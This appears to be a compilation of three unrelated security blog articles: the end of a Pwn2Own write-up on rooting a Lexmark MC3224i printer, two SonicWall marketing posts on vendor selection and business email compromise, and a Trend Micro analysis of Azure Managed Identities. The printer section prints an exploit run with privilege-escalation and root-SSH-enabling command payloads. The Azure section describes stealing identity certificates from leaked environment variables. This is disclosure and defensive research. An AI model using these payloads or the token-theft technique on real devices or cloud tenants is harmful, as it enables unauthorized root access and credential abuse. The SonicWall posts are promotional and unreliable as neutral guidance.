An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., the setup wizard has been completed) or is password-less (i.e., the authentication reset was already executed earlier or the setup wizard has not yet been completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Three Keys to Modern Cyberdefense: Affordability, Availability, Efficacy

Choosing a cybersecurity vendor can feel like a never-ending series of compromises. But with SonicWall’s portfolio of high-quality solutions — available at industry-leading TCOs and in stock — it doesn’t have to.

(Our previous supply-chain updates can be found here and here.)

If you’ve ever been to a small-town mechanic, chances are you’ve seen the sign: “We offer three types of service here — Good, Fast and Cheap. Pick any two!”

In cybersecurity, this can be framed as “Affordability, Availability and Efficacy,” but the idea is the same — when making your choice, something’s got to give.

The effects of this mentality are sending ripples across the cybersecurity industry. At the recent 2022 RSA Conference, Joe Hubback of cyber risk management firm ISTARI explained that based on his survey, a full 90% of CISOs, CIOs, government organizations and more reported they aren’t getting the efficacy promised by vendors.

Several reasons for this were discussed, but most came back to this idea of compromise — buyers want products now, and they’re facing budget constraints. So, they often believe the vendors’ claims (which tend to be exaggerated). With little actual evidence or confirmation for these claims available, and little time to evaluate these solutions for themselves, customers are left disappointed.

To make the buying process more transparent and objective, Hubback says, vendor solutions should be evaluated in terms of Capability, Practicality, Quality and Provenance. While his presentation didn’t reference the Affordability-Availability-Efficacy trifecta directly, these ideas are interconnected — and regardless of whether you use either metric or both, SonicWall comes out ahead.

Availability: Supply-Chain Constraints and Lack of Inventory

Order and install times have always been a consideration. But the current climate has led to a paradox in modern cybersecurity: With cyberattack surfaces widening and cybercrime rising, you really ought to have upgraded yesterday. But in many cases, the components you need won’t be in stock for several months.

While many customers are being locked into high-dollar contracts and then being forced to wait for inventory, this isn’t true for SonicWall customers: Our supply chain is fully operational and ready to safeguard your organization.

SonicWall is currently fulfilling 95% of orders within three days.

Procurement Planning & Forecasting

“We’re hearing more often than not that our competitors don’t have the product on the shelf, but we’ve been managing this for nearly two years,” SonicWall Executive Vice President of Operations Yew-Joo Hoe said.

In autumn of 2020, as lead times began to creep up, SonicWall’s operations department immediately began altering internal processes, changing the way it works with suppliers and ships goods, and even re-engineering some products to deliver the same performance with more readily available components.

So now, even amid remarkable growth — 2021 saw a 33% increase in new customer growth, along with a 45% rise in new customer sales — SonicWall is currently fulfilling 95% of orders within three days.

But even as we’ve zeroed in on supply-chain continuity, our dedication to the Provenance of our supply chain has been unwavering. We aim to secure, connect and mobilize organizations operating within approved or authorized regions, territories and countries by ensuring the integrity of our supply chain from start to finish.

SonicWall products are also compliant with the Trade Agreements Act in the U.S., and our practices help ensure SonicWall products aren’t compromised by third parties during the manufacturing process.

Affordability: The Two Facets of TCO

SonicWall’s goal is to deliver industry-leading TCO. But this is more than a marketing message for us — we put it to the test.

SonicWall recently commissioned the Tolly Group to evaluate the SonicWall NSsp 13700, the NSsp 15700, the NSa 2700 and more against equivalent competitor products. Each time, the SonicWall product was named the better value, saving customers thousands, tens of thousands and even hundreds of thousands while delivering superior threat protection.

But we also recognize that the measure of a product’s affordability extends beyond the number on an order sheet, to how much labor that solution requires. Hubback summarized the idea of Practicality as “Is this actually something I can use in my company without needing some kind of Top Gun pilot to fly it and make it work?” With cybersecurity professionals getting harder to find, and their experience becoming more expensive every day, the ideas of Practicality and Affordability have never been so intertwined.

Fortunately, SonicWall has long recognized this association, and we’ve built our products to reduce both the amount of human intervention and the required skill level needed to run our solutions.

Innovations such as Zero-Touch Deployment, cloud-based management, single-pane-of-glass interfaces, simplified policy creation and management, and one-click rollback in the event of a breach have brought increased simplicity to our portfolio without sacrificing performance or flexibility.

Efficacy: How It’s Built and How It Performs

Hubback’s final two criteria, Quality and Capability, describe how well a solution is built, and how well it can do what it promises. Taken together, these form the core of what we think of as Efficacy.

While Quality is the most enigmatic of Hubback’s criteria, it can be reasonably ascertained based on a handful of factors, such as longevity, customer satisfaction and growth.

With over 30 years of experience, SonicWall is a veteran cybersecurity leader trusted by SMBs, enterprises and government agencies around the globe. In the crowded cybersecurity market, this sort of longevity isn’t possible without quality offerings — and our quantity of repeat purchasers and scores of customer case studies attest to the high standards we maintain for every solution we build.

In contrast, Capability can be very easy to judge — if a vendor chooses to put its products to the test. Independent, third-party evaluation is the gold standard for determining whether products live up to their promises. And based on this metric, SonicWall comes out on top.

To provide customers objective information about its performance, SonicWall Capture ATP with RTDMI has been evaluated by third-party testing firm ICSA Labs, an independent division of Verizon. For the past five consecutive quarters, the solution has found 100% of the threats without issuing a single false positive. SonicWall has now earned more perfect scores — and more back-to-back perfect scores — than any other active vendor.

Today, thousands of organizations will shop for new or upgraded cybersecurity solutions. While they may differ in size, industry, use case and more, at the end of the day, they’re all looking for basically the same thing: A reliable solution that performs as advertised, at a price that fits within their budget, that can be up and running as soon as possible.

There will always be those who tell you that you can’t have everything; that the center of this Venn diagram will always be empty. But at SonicWall, we refuse to compromise — and we think you should, too.

Source :
https://blog.sonicwall.com/en-us/2022/06/three-keys-to-modern-cyberdefense-affordability-availability-efficacy/

BEC Attacks: Can You Stop the Imposters in Your Inbox?

BEC attacks are a $1.8 billion racket — and statistically, your business will be targeted sooner rather than later. Watch this webinar to learn how to stop them.

If asked which of the threat types tracked by the FBI causes the most financial damage, most people would say ransomware.

They’d be wrong.

In 2021, the FBI’s Internet Crime Complaint Center (IC3) received 19,954 Business Email Compromise (BEC) reports, with adjusted losses totaling almost $2.4 billion. That’s an average of more than $120,270 per incident, compared with just under $13,200 per incident for ransomware attacks.

Since the FBI began tracking these threats in 2013, tens of billions in financial losses have been recorded, resulting from nearly 170,000 incidents in 178 countries.

So why hasn’t this threat risen to the notoriety of ransomware?

During many ransomware attacks, business operations grind to a halt. When a company loses access to customer information, payment systems and mission-critical applications, it often becomes clear in short order that something is wrong.

But BEC attacks are comparatively silent. Even when these attacks have a huge impact on an organization’s bottom line, operations can generally continue as usual. As a result, businesses frequently opt to keep these attacks out of the public eye to avoid risking reputation damage and loss of trust.

But although ransomware still dominates security news, the growing frequency, volume and cost of BEC attacks have begun attracting more attention.

As a result, BEC attacks have become a top threat concern for many organizations today, according to a recent SonicWall-sponsored white paper by Osterman Research. “How to Deal with Business Email Compromise” reports primary research data from an in-depth customer survey of 119 respondents, each of which has direct knowledge of how their organization is addressing or planning to address the risk of BEC.

The results from this study offer a look at how security influencers and decision-makers are taking BEC into account when formulating their spending plans for the next 12 months. For example, while just 46% of organizations said they considered protecting against BEC attacks “important” or “extremely important” 12 months ago, 76% said they considered it important or extremely important today.

80%: Organizations indicating that protecting against BEC attacks in 2023 is of high importance

The data also shows that three-fifths of organizations in the study view protecting against BEC attacks as one of their top five security priorities.

62%: Organizations ranking protecting against BEC attacks as one of their top five priorities.

How BEC Attacks Fly Under the Radar

But what makes BEC attacks so dangerous when compared with other forms of cyberattacks? And why are they harder to stop?

BEC is a specialized type of phishing attack that relies on social engineering. These attacks often use a proven pretexting technique to engineer a quick introduction and establish a believable scenario in order to manipulate the victim into taking a specific action.

While these attacks can target employees at any level of an organization, they generally start with an attacker impersonating a person with authority, such as a CEO or CFO, a manager, or a supplier. The attacker uses the authority figure’s identity to start a chain of plausible (but fake) requests to gain monetary payment. This typically involves instructing someone in accounts payable, someone in HR or even someone with a company credit card to pay a fake invoice, transfer funds, send gift cards or make payroll payouts. The urgent tone of these messages encourages the victim to respond or act quickly, bypassing any checks and balances that may be in place.

Compared with other forms of cyberattacks, BEC attacks are among the hardest to detect because the threat signals are far less obvious. Relying on trickery and impersonation, the approach is very subtle, and the actual delivery generally doesn’t use weaponized URLs or malicious attachments, which are easily detected.

In addition, the email content and the delivery mechanism are usually of higher quality and often tailored to target a specific person or persons. With little to no apparent sign of a threat, these messages can bypass most email security filters to reach the inbox — and the absence of any sort of alert, such as a contextual warning advising them to exercise caution, leaves the victim more vulnerable to falling for the scam.

Because so many of these scams are successful, their use has grown dramatically: today, roughly 80% of companies are targeted by BEC attacks each year. While there isn’t much you can do to avoid being targeted, there’s plenty you can do to safeguard your organization’s finances. To learn more about BEC attacks and how to stop them, check out our webinar, “Can You Stop the Imposters in Your Inbox?”

Source :
https://blog.sonicwall.com/en-us/2022/06/bec-attacks-can-you-stop-the-imposters-in-your-inbox/

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service and its security capability in a threat model as developers’ go-to feature for managing secrets and credentials.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken Access Control is listed in the OWASP Top 10 of prevalent web application issues in both 2017 and 2021, and we have previously written about the importance of secrets management for authentication. Broken access control occurs when a user can access, modify, delete or perform actions within an application or system outside the permissions or policies set for them, whether maliciously or unintentionally. It has become the number one item on the OWASP list, and in this article we discuss how Azure’s Managed Identities service inside the cloud service provider (CSP) helps tackle this web application issue.

Managing system and user identities

Managed Identities for Azure allows users to authenticate to certain services available within the CSP. This is done by providing the cloud application with a token used for service authentication. There are two types of managed identities: system-assigned and user-assigned. A system-assigned identity is tied one-to-one to a single resource, which means that different roles can’t be applied to the same resource. User-assigned identities solve this problem; we can think of them as user roles.

Figure 1. Usage of Managed Identities

For instance, suppose we want to use an Azure storage account within a serverless application to save our application records, and we decide to use a system-assigned identity.

This practically means:

  • Enable managed identities inside a serverless function
  • Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function

After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.

Managing identities in the serverless environment

To make this work, the serverless environment runs a special .NET application process, "dotnet TokenServiceContainer.dll", which listens on localhost port 8081 for HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token; its required parameters specify the API version used and the resource identifier for which the token is requested. An optional "client_id" parameter is used when a token for a user-assigned identity is requested. The request also needs a specific X-IDENTITY-HEADER header, whose value is found in the IDENTITY_HEADER or MSI_SECRET environment variable.

After receiving the token request, the token service delegates it to another endpoint within the CSP, which provides the requested token. That endpoint is publicly reachable and lives under a *.identity.azure.net subdomain chosen by the region of the serverless application. Because the endpoint is public, it requires authentication by design, which is done with an X.509 client certificate. This certificate is unique to the specific application ID (the serverless function has a one-to-one pairing of certificate and app ID) and is valid for 180 days. If the request succeeds, the endpoint returns a JSON response containing a bearer token valid for one day.
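As an added example (not the article's code), here is how a function app would request a token from the local endpoint just described, in Python. The endpoint default, the header and the variable names come from the article; the api-version value is an assumption taken from Azure's App Service documentation, so verify it against your runtime.

```python
import json
import os
import urllib.parse
import urllib.request

# api-version accepted by the App Service / Functions identity endpoint
# (assumed from Azure's documentation; verify against your runtime).
API_VERSION = "2019-08-01"
# Article: the token service listens on localhost:8081 under /msi/token.
DEFAULT_ENDPOINT = "http://localhost:8081/msi/token"


def build_token_request(resource, client_id=None, env=None):
    """Return (url, headers) for a token request to the local MSI endpoint.

    resource  -- audience of the token, e.g. "https://storage.azure.com/"
    client_id -- only set for a user-assigned identity (the optional client_id)
    env       -- mapping holding IDENTITY_ENDPOINT / IDENTITY_HEADER / MSI_SECRET
    """
    env = os.environ if env is None else env
    endpoint = env.get("IDENTITY_ENDPOINT", DEFAULT_ENDPOINT)
    # The per-app secret lives in IDENTITY_HEADER (older runtimes: MSI_SECRET).
    secret = env.get("IDENTITY_HEADER") or env.get("MSI_SECRET")
    if not secret:
        raise RuntimeError("managed identity not enabled: IDENTITY_HEADER/MSI_SECRET unset")
    params = {"api-version": API_VERSION, "resource": resource}
    if client_id:
        params["client_id"] = client_id
    url = endpoint + "?" + urllib.parse.urlencode(params)
    # The secret goes in a header, never in the URL, so it stays out of access logs.
    return url, {"X-IDENTITY-HEADER": secret}


def parse_token_response(body):
    """Return (access_token, expires_on) from the endpoint's JSON reply."""
    data = json.loads(body)
    if "access_token" not in data:
        raise RuntimeError("no access_token in response: %s" % data.get("error", data))
    return data["access_token"], int(data.get("expires_on", 0))


def get_token(resource, client_id=None):
    """Fetch a bearer token for `resource` from inside the function app."""
    url, headers = build_token_request(resource, client_id)
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return parse_token_response(resp.read().decode("utf-8"))
```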

Figure 3. Managed identities inside serverless environments


From that perspective, the security standard is high, which is expected from a CSP service. However, there is one hidden danger: the certificate itself, which can be exposed by leaking environment variables.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be fetched from the URL held in the CONTAINER_START_CONTEXT_SAS_URI variable and decrypted with the CONTAINER_ENCRYPTION_KEY variable. Once leaked, the certificate can be used to obtain the token outside the scope of the CSP's services, against the publicly available endpoint, exactly as if the request came from the CSP service itself.

Threat model and scenario

Figure 4. PoC of getting token using leaked environmental variables from Managed Identity service


At this point, we should emphasize that to abuse the obtained token, a malicious actor must first leak these environment variables, and the identity must have a role assigned on the requested resource; the prerequisites are that managed identities are enabled and a role has been set for the application. There are no default roles unless they are explicitly specified in the CSP settings.

However, as this example of potential compromise through leaked environment variables on a Linux endpoint shows, storing sensitive information in environment variables is not a secure approach, since they are inherited by child processes by default. Because the information is available inside the environment itself and the certificate carries everything needed, the token endpoint effectively becomes publicly usable: a threat actor can obtain the authentication token outside of the CSP's service and gain all the permissions of the original identity.

In this example, the token provider service within the serverless environment runs under a different user. Why, then, is the client certificate not made available only to that user, as a file readable by that user alone? As it stands, a compromised serverless function can leak the certificate and obtain the access token from the external service. While the unauthorized user gains no privileges beyond those the function already has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving the client certificate into the security boundary of the token service user and granting that user read-only access to it, we guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.

The security chain is only as strong as its weakest link. And while CSP services are not inherently insecure, small design weaknesses combined with improper user configurations can lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid using environment variables for sensitive information. Following best security practices such as applying the principle of least privilege helps to mitigate the consequences of a breach.
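To make the inheritance point concrete, this added Python example (not the article's code) spawns a child process once with the parent's full environment and once with an allow-listed copy, and checks whether the child can read the identity secrets the article names. The allow-list itself is an assumption for illustration; the planted secret value is constructed.

```python
import os
import subprocess
import sys

# Variables the article identifies as sensitive inside the Functions container.
IDENTITY_SECRET_VARS = {
    "IDENTITY_HEADER",
    "MSI_SECRET",
    "CONTAINER_ENCRYPTION_KEY",
    "CONTAINER_START_CONTEXT_SAS_URI",
}
# Assumed allow-list of what a helper process legitimately needs (illustrative).
CHILD_ALLOWLIST = {"PATH", "HOME", "LANG", "LC_ALL", "TMPDIR", "SYSTEMROOT", "TEMP", "TMP"}


def scrubbed_env(parent_env, allowlist=CHILD_ALLOWLIST):
    """Copy only allow-listed variables, and never an identity secret."""
    return {k: v for k, v in parent_env.items()
            if k in allowlist and k not in IDENTITY_SECRET_VARS}


def child_sees(var, parent_env, scrub):
    """Spawn a Python child and report whether `var` is visible in its environment."""
    env = scrubbed_env(parent_env) if scrub else dict(parent_env)
    probe = "import os, sys; sys.exit(0 if %r in os.environ else 1)" % var
    return subprocess.run([sys.executable, "-c", probe], env=env).returncode == 0


def demo(var="MSI_SECRET"):
    """Constructed demo: plant a fake secret in a copy of this process's environment
    and compare default inheritance with the scrubbed child."""
    parent = dict(os.environ, **{var: "constructed-secret-value"})
    return child_sees(var, parent, scrub=False), child_sees(var, parent, scrub=True)


if __name__ == "__main__":
    print(demo())  # (True, False): inherited by default, absent after scrubbing
```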

Source:
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments